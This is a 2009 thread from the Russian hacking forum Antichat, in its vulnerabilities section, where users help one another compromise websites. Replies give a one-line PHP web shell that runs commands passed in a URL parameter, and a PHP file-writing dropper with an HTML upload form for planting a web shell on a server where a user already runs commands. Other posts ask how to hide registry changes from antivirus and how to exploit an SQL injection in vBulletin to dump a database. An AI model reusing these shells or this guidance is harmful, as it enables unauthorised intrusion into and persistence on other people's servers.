ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5051  
Старый 26.01.2009, 18:18
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

https://forum.antichat.ru/showpost.php?p=198446&postcount=3
 
Ответить с цитированием

  #5052  
Старый 26.01.2009, 18:25
Аватар для Neponomat
Neponomat
Новичок
Регистрация: 23.01.2009
Сообщений: 11
Провел на форуме:
60789

Репутация: 0
По умолчанию

Цитата:
Сообщение от j0ker13  
2Neponomat чтоб добавить запись в реестр без запроса юзай так: "regedit /s 1.reg"
чётат так не юзаеься ) куда это так надо написать?
а если заюзать вот так, но только без оповещения и без удаления в конце. как лучше? антивирус молчит на такие действия

WSHShell = WScript.CreateObject("WScript.Shell"); WSHShell.Popup("Создаем раздел"); WSHShell.RegWrite("HKCU\\MyRegKey\\", "Primer"); WSHShell.Popup("Создаем строковый параметр"); WSHShell.RegWrite("HKCU\\MyRegKey\\String", 1); WSHShell.Popup("Создаем параметр DWORD"); WSHShell.RegWrite("HKCU\\MyRegKey\\DWORD", 2, "REG_DWORD"); WSHShell.Popup("Создаем двоичный параметр"); WSHShell.RegWrite("HKCU\\MyRegKey\\Binary", 3, "REG_BINARY"); WSHShell.Popup("Удаляем все параметры"); WSHShell.RegDelete("HKCU\\MyRegKey\\String"); WSHShell.RegDelete("HKCU\\MyRegKey\\DWORD"); WSHShell.RegDelete("HKCU\\MyRegKey\\Binary"); WSHShell.Popup("Удаляем раздел"); WSHShell.RegDelete("HKCU\\MyRegKey\\");

Последний раз редактировалось Neponomat; 26.01.2009 в 18:42..
 
Ответить с цитированием

  #5053  
Старый 26.01.2009, 22:33
Аватар для procedure
procedure
Banned
Регистрация: 22.12.2007
Сообщений: 660
Провел на форуме:
3885269

Репутация: 1158


По умолчанию

Видели когда нибудь такие ссылки:
http://wallenberg.ru/component/option,com_contact/task,view/contact_id,1/Itemid,94/

??? Если изменяю, id на -999 допустим, открывается стандартная какая то страница. Почему?
 
Ответить с цитированием

  #5054  
Старый 26.01.2009, 22:39
Аватар для .Slip
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

Цитата:
Сообщение от procedure  
Видели когда нибудь такие ссылки:
http://wallenberg.ru/component/option,com_contact/task,view/contact_id,1/Itemid,94/

??? Если изменяю, id на -999 допустим, открывается стандартная какая то страница. Почему?
модреврайт

>> Почему?
Мб потому что значение которое ты указываешь не существует?
__________________
..
 
Ответить с цитированием

  #5055  
Старый 27.01.2009, 08:34
Аватар для Nightmarе
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию

Значит затёрся на одном месте.
Есть в скрипте выполнение php команд.
Хочу залить шелл в одну директорию, права на неё: drwxrwxrwx
Системные команды выполняются, но ни через WGET, ни через copy не заливается шелл... Типа команда выполненна без ошибок, но итог 404
Инклуд тоже не пашет...

Что тут можно предпринять?
 
Ответить с цитированием

  #5056  
Старый 27.01.2009, 10:44
Аватар для Corwin
Corwin
Познающий
Регистрация: 01.08.2008
Сообщений: 42
Провел на форуме:
670601

Репутация: 50
По умолчанию

в чем проблема заюзать другую качалку вроде lynx
 
Ответить с цитированием

  #5057  
Старый 27.01.2009, 11:12
Аватар для groundhog
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549

Репутация: 1318


Отправить сообщение для groundhog с помощью ICQ
По умолчанию

Nightmarе, а что тебе мешает выполнить команду:

Цитата:
echo "<?php system(\$_GET['cmd']); ?>" > shell.php
Пробуй писать полные пути...
 
Ответить с цитированием

  #5058  
Старый 27.01.2009, 11:21
Аватар для oRb
oRb
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940

Репутация: 2362
По умолчанию

groundhog, по сути у него это и есть)

Nightmarе, можно создать файл, как сказал groundhog, только его содержимое будет примерно таким:

PHP код:
<?php file_put_contents('путь до файла'$_POST['file']); ?>
Далее, создаешь на локале файл:
Код HTML:
<form action='http://site.com/путь_до_получившегося_файла' method='post'>
<textarea name='file'></textarea>
<input type='submit'/>
</form>
Кидаешь в текстарею код шелла, жмешь баттон, и получаешь веб-шел)
 
Ответить с цитированием

  #5059  
Старый 27.01.2009, 20:54
Аватар для NooB MC
NooB MC
Новичок
Регистрация: 18.11.2008
Сообщений: 7
Провел на форуме:
25855

Репутация: 0
По умолчанию

Комрады подскажите!!!
Нужно похекать сайт на vBulletin 3.5.4
На одном из форумов видел SQL INJ - из-за недостаточного ограничения на доступ к сценарию upgrade_301.php в каталоге 'install'.
Таким образом можно сделать дамп базы данных.
Как должен будет выглядеть запрос?
Мне для начала нужно заняться подборкой полей?
Просто Инъекциями я начал заниматься недавно, в голове полная каша...
помогите разобраться...
 
Ответить с цитированием

  #5060  
Старый 27.01.2009, 21:00
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Цитата:
Мне для начала нужно заняться подборкой полей?
ага, только перед этим еще убедится, что по данному урлу именно sql-inj, а не просто раскрытие пути и т.п.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ